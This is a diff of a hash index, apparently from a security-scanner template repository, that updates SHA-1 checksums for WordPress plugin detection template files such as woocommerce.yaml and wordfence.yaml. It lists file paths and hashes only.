-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:ac44e64c8e11a673d580da9a426afe75b224e965 -http/technologies/wordpress/plugins/gtranslate.yaml:42193af95ea0b9ce006f90299d0381fc07ddb1e9 -http/technologies/wordpress/plugins/gutenberg.yaml:ef56a84904f9a0cab4c67c7e434b1c596b396f21 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:642f1f09dc2d41ab0be7a880924a18d9f8ca41bd +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:2ce79134ffd98a0c7bb988b09009dc18a4677a90 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:2f8c79e9f8af30c6a80b5eec40e34c86a8990b5c -http/technologies/wordpress/plugins/header-footer-elementor.yaml:de82f5ad0a79a6c41e42ee81916cb1a2be9e5679 -http/technologies/wordpress/plugins/header-footer.yaml:bf84b3a41cbcd0a1e4fcad6921cad831a8b35ac0 -http/technologies/wordpress/plugins/health-check.yaml:5e9c9855c6ac8c905bd4e2895136d87cf47aa823 -http/technologies/wordpress/plugins/hello-dolly.yaml:e8bf8d8217801d8443d8add37c765c951f851f20 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:6764ff2048d3ff252d7829bee0468de8fd1d2ef5 -http/technologies/wordpress/plugins/hostinger.yaml:777e386bed26e6b9b3bf2e76b239b8cb760b3531 -http/technologies/wordpress/plugins/image-optimization.yaml:2777af313c8066dc5310403e542a22751a64afe4 -http/technologies/wordpress/plugins/imagify.yaml:37e5001c32bfbd84ad7c7ea7731a854b684a1bae +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:1c6be6bc344e532324a2ddd3909f1a894db83bd8 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff http/technologies/wordpress/plugins/imsanity.yaml:319c06bed3d7611b6a05e2aaa77fb998a3205778 http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml:7544703f23942190d32f575fe3f4b1398dfa3260 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:ba42b7a8d9beda9329606f58501295625aa9dcc9 -http/technologies/wordpress/plugins/instagram-feed.yaml:a30badc9299a4b6055091d60a6aa9b4ec9b1b228 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a91e62727b9b7ae080a5e4b6640fdce34a1be588 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7cfe45f9202488fec2a3f4dc699e48f9159838f8 -http/technologies/wordpress/plugins/jetpack.yaml:0c8b3f7d0b6d445ee82492f92a559047516f6b63 -http/technologies/wordpress/plugins/kadence-blocks.yaml:f42424a57956e746c1945f60dac20e166d5310d0 -http/technologies/wordpress/plugins/kirki.yaml:8cc0ff791c4129719f4a30c13af0b767a1a67f62 -http/technologies/wordpress/plugins/leadin.yaml:61e8add9093eb0795b001c37dd864e75fb55ad3c -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:2ea1e8f77189fea80072172d716234172270bbf2 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:0fa6d4198d217a5e1b28788f971f1739c50a528e -http/technologies/wordpress/plugins/litespeed-cache.yaml:411279e4481d3dd37c34a24837ce3344683d3e82 -http/technologies/wordpress/plugins/loco-translate.yaml:578755e4b37933101a3f70f0a9e081c884332942 -http/technologies/wordpress/plugins/loginizer.yaml:2f55f4998c825bb01a9cc6469901278f75484959 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:721b9487cbc30a776670e8971f8a72c981792649 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:5b35d8e2f5174ea943a79f33b5d9efc7eaac3749 -http/technologies/wordpress/plugins/mailpoet.yaml:e03d43d922bc893c90b866efac6b05d6425e7c60 -http/technologies/wordpress/plugins/maintenance.yaml:d0892e9a0decfa5cb2f167d6c42ff51cc1da20c5 -http/technologies/wordpress/plugins/mainwp-child.yaml:7e02e159763b29152cc7c32b011c5d08fd856a91 -http/technologies/wordpress/plugins/malcare-security.yaml:2d4756e312a3243f38cd81829abafc20308fd9d4 -http/technologies/wordpress/plugins/megamenu.yaml:8c9a81f868623679f24cf4c5f50a258cdc820c77 -http/technologies/wordpress/plugins/members.yaml:6f64d7f2e81285344fed52d0f48f90d135193963 -http/technologies/wordpress/plugins/meta-box.yaml:6da08e6c5b90756a462d7730dd1602749f4de8e8 -http/technologies/wordpress/plugins/metform.yaml:1bc8104cb9d0394fe32d41eec60cd208ef2ee32d -http/technologies/wordpress/plugins/ml-slider.yaml:ae3a4c25cb64137ba9fabcfef87ebabc47ca4258 -http/technologies/wordpress/plugins/newsletter.yaml:38ef8b3f5257346c8b819933f01e60103723a980 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:04380ffb8a3cec3f50c1183a8cb6ea6b9c17a4d5 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:db45476ae4354690fef82e11efeb91001051cb67 -http/technologies/wordpress/plugins/ninja-forms.yaml:a51762fa4643f17527d2fa5fc9fc6533754c258c -http/technologies/wordpress/plugins/ocean-extra.yaml:1c53b0b5455b5cf41fc6aedba48d70f49b63664e -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:6a717267353d94ceb97a443de95cddef59a6603a -http/technologies/wordpress/plugins/one-click-demo-import.yaml:739fb043e62c7d1fb1484d5be83ab0d388ebbe02 -http/technologies/wordpress/plugins/optinmonster.yaml:0c7f75e0111eefd1eae1ef4a9850d44e910fc173 -http/technologies/wordpress/plugins/otter-blocks.yaml:9457271043c2ce42884ee96b9af2eb45aaceca65 -http/technologies/wordpress/plugins/password-protected.yaml:8a360d25b319a5135313e73f2c5537255868ff2e -http/technologies/wordpress/plugins/pdf-embedder.yaml:d18eae5f1cfe37eba5b8ca186452b1d0b17ee9c0 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:c274f39e569adf0c41b69c94e3e3d6cf50b43817 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:2fb6e282504f3ab516bf8dda5fa84624bec49aea +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:e805aa0f24118a419ba698e01f4040c3e021358d +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:64efbae172550ad4d2f7ec23be3affaf497165bc -http/technologies/wordpress/plugins/pixelyoursite.yaml:53e895d387f3ec98b9dc16613f9ee6ae82341c01 -http/technologies/wordpress/plugins/polylang.yaml:7f44f1e08fd470c6cc421e30cc2577d31669f818 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:d8f5c75df0e09e528672fd0dcbdfe04e41401be3 -http/technologies/wordpress/plugins/post-smtp.yaml:8a0f5ae5c96ea3b82661c846c3203b4e671749a9 -http/technologies/wordpress/plugins/post-types-order.yaml:16a74446f0c19cf39e46bcdd4e86b81110660d6f -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c6fadf9668cb06bc002adc934f2e665bdad9aa69 -http/technologies/wordpress/plugins/pretty-link.yaml:9099e7d0c95ee02494dcd6caf246affc36342fbe -http/technologies/wordpress/plugins/really-simple-captcha.yaml:458380ebe439db265867bc5e37ac986fa4efb246 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:907c0eefd98a869f90595134396c1e2631c4d7a2 -http/technologies/wordpress/plugins/redirection.yaml:ba6758f86ab5f696fcea55dee70c2dc1895a7742 -http/technologies/wordpress/plugins/redux-framework.yaml:758620c3dd3a6fcf33ca4bb69df4d8000607812d -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:7ed1c2c1f43f72ab6bd55552dd1567f854884ef2 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:1e8494c0ef97e886cfb799486f9003b68cbaa088 -http/technologies/wordpress/plugins/safe-svg.yaml:ef939b517816269875acb7dc84bc3096a5f79b9d -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:ee5d91e1bc123962d61fc0cb131160dd991a6cd7 -http/technologies/wordpress/plugins/sg-cachepress.yaml:9e7a7d8960923b24db783d830d484dcec0cab901 -http/technologies/wordpress/plugins/sg-security.yaml:efa1a0570332f393cfc525f3eb4e0548c92e322e -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:721459489b1f50bf54f614bd7d2705e45961975f -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:9e2123795d6521e8f97e3e57de4496e5195d1227 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:254ec2f86a4376ffa82a11e27b973ee0c3b20fc6 -http/technologies/wordpress/plugins/simple-history.yaml:e618775c77d82bf50abf8d2996a8db7b0c25ff32 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:020ac98ee8b37e204e0935108f9d69e52db78397 +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:c16fc6f054bdd78231f6a5cf5d795bd77a5b4f48 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:95e58194eebbc519657cc345dfc48c9874b1e8ed -http/technologies/wordpress/plugins/smart-slider-3.yaml:a086caae373717dd6bc697f404f224bfb7c3baab -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:c8e02063b37a9f8f467ed4058f45c64253c5a274 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:1b506638fa568e33eb4b4d431ac50441e4d2f943 +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:74d02a010811976b8fd6f22dc8ea33274dfbcdfe -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:0d692fdd61ebc94a1afaad0cf496ba5c46f7c3b2 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:83bd44a0d075d2208408fc1d78bfc5ec5cf153b7 -http/technologies/wordpress/plugins/svg-support.yaml:7fd94b5719bb15f4bc071945b9c97b26cab3dc7e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 http/technologies/wordpress/plugins/table-of-contents-plus.yaml:142cf7dc3d34ed35422ad91447b3f1f986d965b6 -http/technologies/wordpress/plugins/tablepress.yaml:b7ed7850941c5aa89758a5341ab9c7f2667534a7 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:e2780246cbc2816ae0337ea2a1f1da22dadbb88c -http/technologies/wordpress/plugins/templately.yaml:5d72b2b2d83b8b44856b16708475b6a89c25a7a8 -http/technologies/wordpress/plugins/the-events-calendar.yaml:439a1b7200a70013fa83f237795e6fedd27ec088 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:b52030e20304c5c9ee960c9d2952b3be2d68e542 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:945736adbb00b13e66054c0c99cb0273aff77a43 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:1f44b49ae2b3954d76cbeb097c106f1ff0113315 -http/technologies/wordpress/plugins/under-construction-page.yaml:1899ef111f3a69ca6e19d8c67bbf19717f643667 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:885995fc91fff0e4c7282dabc050cc8aafff6bf5 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:2ddde1535ca92e0957d21072e8f18a24a0431f99 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:732fde96032f0b9cfa9017b4c3179ccb3bbb24ac -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:4d9c66372b8b16e23afc78bbfc413ead7d1dda26 -http/technologies/wordpress/plugins/webp-express.yaml:2e17b97016e5ac5c02883033d2c44c81ecf6d879 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 http/technologies/wordpress/plugins/widget-importer-exporter.yaml:6704a9b4d0dcda2afcbac6ec83aab1e38ff1f0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:8ed2d07c932afe81b968f49f5eef5f4d0ee0b485 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0631841e93fa85997554b9f934ecec3a4305c122 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 http/technologies/wordpress/plugins/woo-inpost.yaml:ccc431985c9227d06dce6cd78efea4b46ddf791c -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:16eaefe33960e54407ce42cbcb2f6678c7cf09f6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:097b3a0730180351943fb6854be82dd0309bb4a5 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:2612fc6740219daca153546462f048792d471249 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:17d0837eed8c514bc7a018038d2fc79c7e5899cb -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:1fe21348d5eb063dad3d55f73dc5983e3c00fa0e -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:ba03c8714fd1be6c141e55e61df0af2e73ca1c73 -http/technologies/wordpress/plugins/woocommerce-services.yaml:1425abeb25c04b81ce840879d9b4efd5aa4386c5 -http/technologies/wordpress/plugins/woocommerce.yaml:498e777e6a0303f75646ad590389e413198bdc45 -http/technologies/wordpress/plugins/wordfence.yaml:73666d89eb1c95da6a6fbf9c6d68dae5195c8de9 -http/technologies/wordpress/plugins/wordpress-importer.yaml:f48772726515f815f42ba50895c620de392ebaee -http/technologies/wordpress/plugins/wordpress-seo.yaml:6a63c75ccfdba03388c457df971c780fc341c312 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:119618b338cf9b154484b826d5ddb14b2bb6790a -http/technologies/wordpress/plugins/wp-crontrol.yaml:ea82b2bd854f65c6df566cd6dbda999d319b5523 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ef075151ba2c69920137548fcce063130f16c9ab -http/technologies/wordpress/plugins/wp-file-manager.yaml:c74dd7f6d9fa93943b9854f017d855ea9d5e1eb1 -http/technologies/wordpress/plugins/wp-google-maps.yaml:a6069ccb184507496cf0874abe9164439f9d6b7a -http/technologies/wordpress/plugins/wp-mail-logging.yaml:e45e9fac790ba44719fe51992b813f62e87e7671 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:f99de29d1961a8f9d22b8f1703604681114f9b3d -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:191d944fe0ca94688f14320bbc9503492ae68014 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-logging.yaml:43cc5e8e1534e83039984a4f1affb3c2552fe63f +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:10b7d3c96ef44d16cc9ab5da9eeed5395f11396d http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:21e5aadc905520b62039c7a34f904f2cb88d565c -http/technologies/wordpress/plugins/wp-optimize.yaml:320d1a0b04c1829718fa3da2a020fd31e4e66623 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:dfca47bbc40bdcb30781c6229cfb5253f516bed0 -http/technologies/wordpress/plugins/wp-reset.yaml:b955d46112f52f5d5b7087511ede3809b35937dc -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:30c99b580ca27ccb6e1d1696715f76aadff55ace -http/technologies/wordpress/plugins/wp-rollback.yaml:a147886b718758fcae5fcc0b40105e471d534d6c -http/technologies/wordpress/plugins/wp-seopress.yaml:3414f320fa58af8a1960c3ff98a9a9b3eadc73b0 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:b05957e1effb8833dd9e1310e67721bb835e6510 -http/technologies/wordpress/plugins/wp-smushit.yaml:9ab9de263ae17e74f4b80f0678f32059a059abd2 -http/technologies/wordpress/plugins/wp-statistics.yaml:9bc21404112344af218d6171ed491aa057fdce69 -http/technologies/wordpress/plugins/wp-super-cache.yaml:c4faddd07e145d4b1935f43a9f18fb8672b7a154 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e 